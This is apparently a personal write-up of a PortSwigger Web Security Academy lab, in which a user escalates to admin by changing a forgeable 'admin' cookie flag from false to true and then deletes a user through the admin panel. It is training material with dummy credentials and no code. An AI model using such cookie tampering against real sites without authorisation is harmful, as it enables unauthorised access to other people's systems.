User role controlled by request parameter
https://portswigger.net/web-security/learning-paths/server-side-vulnerabilities-apprentice/access-control-apprentice/access-control/lab-user-role-controlled-by-request-parameter
Description
This lab has an admin panel at /admin, which identifies administrators using a forgeable cookie.
Solve the lab by accessing the admin panel and using it to delete the user carlos.
You can log in to your own account using the following credentials: wiener:peter
Solution
as indicated into description, we know the admin panel path, but without admin credentials we can't do nothing,
so we can do normal login with followring credentials: wiener:peter
analysing the http response after login, we can see that there're into cookie and admin flag set to false and the session ID:
Setting the admin flag to 'true' we can do a vertical privilege escalation
then, go to admin panel and set the flag equals true:
Now, we can finishing deleting user Carlos:
Last updated